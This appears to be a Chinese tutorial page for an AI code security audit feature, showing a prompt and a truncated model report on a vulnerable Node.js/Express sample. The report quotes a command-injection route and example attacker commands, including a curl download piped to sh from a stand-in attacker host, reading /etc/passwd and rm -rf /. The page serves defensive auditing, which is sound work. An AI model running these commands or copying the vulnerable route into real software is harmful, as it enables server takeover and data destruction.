跳转到主要内容
AI Coding / 开发

AI 代码安全审计 · 定位到修复

把代码交给模型做安全审计,逐条给出漏洞、风险等级与可替换的修复代码。

免责声明:本页展示内容均为 AI 模型生成,仅供参考,不构成任何效果承诺;实际产出效果与 Credits 消耗以平台用量统计为准。
本篇以一段含命令注入、SQL 注入、XSS、硬编码密钥的 Node.js/Express 代码跑通:把代码贴给 qwen3.8-max,它逐条定位漏洞、给出危险原因与可替换的修复代码,最后按风险高低排出整改优先级清单。 调用链:qwen3.8-max(贴入代码 → 逐条漏洞定位 + 修复代码 + 整改优先级)。纯文本推理。

步骤:安全审计

把待审计代码连同下面的指令发给 qwen3.8-max
你是资深应用安全工程师。审计下面这段 Node.js/Express 代码,找出所有安全漏洞:
逐条给出【漏洞类型】【风险等级】【所在位置】【为什么危险】【修复方案(给安全代码)】,
最后给整改优先级清单。【代码】{粘贴含 SQL 拼接 / innerHTML / exec / 硬编码密钥的代码}
下面这段代码存在多个可直接导致服务器沦陷或数据泄露的严重安全问题,不能直接上线。以下按风险从高到低逐条审计。

---

# 一、漏洞审计结果

---

## 1. 任意命令执行 / 远程代码执行 RCE

- 【漏洞类型】操作系统命令注入 / 远程代码执行
- 【风险等级】严重
- 【所在位置】

app.post("/exec",(req,res)=>{
  const cmd=req.body.cmd;
  require("child_process").exec(cmd,(e,out)=>res.send(out));
});

- 【为什么危险】
  req.body.cmd 完全由请求者控制,并直接传入 child_process.exec()。
  exec() 会启动 shell 执行命令,攻击者可以执行任意系统命令,例如:

id
whoami
cat /etc/passwd
curl http://attacker.example/shell.sh | sh
rm -rf /

  一旦该接口暴露,攻击者可以直接控制服务器,属于最高危漏洞。

- 【修复方案】
  首选方案:直接删除该接口。业务上不应该提供"执行任意命令"的 HTTP API。

安全代码:直接移除或返回 404。

// 方案一:彻底移除 /exec 路由
// 不要再保留 app.post("/exec", ...)

// 如果旧客户端仍可能访问,可以显式返回 404
app.all("/exec", (req, res) => {
  res.status(404).json({ error: "Not
……(完整报告含 SQL 注入 / XSS / 硬编码密钥 逐条修复与整改优先级清单)

说明

  • 消耗:本玩法涉及文本生成(qwen3.8-max,代码安全审计)。
  • 实测效果:在示例代码中准确定位命令注入(RCE)、SQL 注入、XSS、硬编码密钥/弱口令等漏洞,按风险从高到低排序并逐条给出可替换的修复代码。
  • 数据边界:代码进上下文意味着会发送到服务端。真实密钥、内网地址、客户数据请把值替换成占位符再提交 —— 保留代码结构,模型仍能识别出「此处硬编码凭据」这类问题。